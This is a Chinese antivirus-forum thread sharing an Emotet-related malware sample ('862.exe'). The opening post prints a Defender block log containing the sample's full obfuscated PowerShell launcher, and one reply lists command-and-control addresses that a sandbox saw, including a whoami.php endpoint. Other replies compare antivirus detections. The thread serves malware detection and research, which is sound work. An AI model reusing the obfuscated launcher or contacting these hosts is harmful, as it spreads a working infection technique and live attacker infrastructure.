查看: 2839|回复: 36
收起左侧

[病毒样本] 862.exe

[复制链接]
pal家族
发表于 2018-11-10 08:48:54 | 显示全部楼层 |阅读模式
本帖最后由 pal家族 于 2018-11-10 08:58 编辑

来自这里样本下载的并执行的payload
http://bbs.huorong.cn/thread-50429-1-1.html



我是图


2018/11/10 8:51:56        Process action blocked        Windows Command Processor        DESKTOP-001342N\xzz        Blocked: AAC:Office.StartInterpreter.ps        C:\Windows\SysWOW64\cmd.exe               


Source process file hash:     614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f
Path to target process file:     C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Target process file hash:     8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa
Path to target object:     pOwERsHEll      .  (\"{1}{0}{2}\" -f 'I','SET-','tem') (  \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab'  )  (   [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ;   ( & (\"{1}{0}{2}\" -f'ARIA','V','blE' ) (  \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri'  ).Invoke(  (  (   .('Gi' )  (  \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::(  \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke(  'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss'  )  ) )   )


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
左手
发表于 2018-11-10 09:13:34 | 显示全部楼层
拒绝访问
无法访问该网页

对象网址:

https://att.kafan.cn/forum.php?mo ... xNTU0fDIxMzYzMjU%3D
原因: 对象被感染 UDS:DangerousObject.Multi.Generic

消息生成时间: 2018/11/10 9:13:18
BE_HC
发表于 2018-11-10 09:16:39 | 显示全部楼层
Norton B杀
沙箱运行很奇怪的不杀。。。估计也只有下载器的行为

疑似访问以下IP
  1. 187.163.174.149:8080
  2. http://24.199.56.122/whoami.php       
  3. 24.199.56.122
复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
猥琐大叔
发表于 2018-11-10 09:54:59 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kim545
发表于 2018-11-10 10:06:35 | 显示全部楼层
Avira TR/Crypt.ZPACK.c0568d
dreams521
发表于 2018-11-10 10:12:50 | 显示全部楼层
  1. 拒绝访问
  2. 无法访问该网页
  3. 对象网址:
  4. https://att.kafan.cn/forum.php?mod=attachment&aid=MzAxNzI2M3wzNDlkODE4OHwxNTQxODE1OTM4fDQxMzgyMnwyMTM2MzI1
  5. 原因: 对象被感染 UDS:Trojan-Banker.Win32.Emotet.a
  6. 消息生成时间: 2018/11/10 10:12:28
复制代码
松竹承茂
发表于 2018-11-10 10:14:32 | 显示全部楼层
本帖最后由 松竹承茂 于 2018-11-10 10:37 编辑

qvm

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Jerry.Lin
发表于 2018-11-10 10:23:32 | 显示全部楼层
本帖最后由 191196846 于 2018-11-10 10:25 编辑

Win32/GenKryptik.CQOV

Detection created        Nov 09, 2018
www-tekeze
发表于 2018-11-10 10:39:22 | 显示全部楼层

楼主转贴里原始样本是个doc文档,火绒已做过通杀,报的宏病毒。
智量同样杀,样本附后,大家试试。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
www-tekeze
发表于 2018-11-10 10:41:18 | 显示全部楼层

楼主给的这个payload,火绒miss,智量kill 。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 17:58 , Processed in 0.135543 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表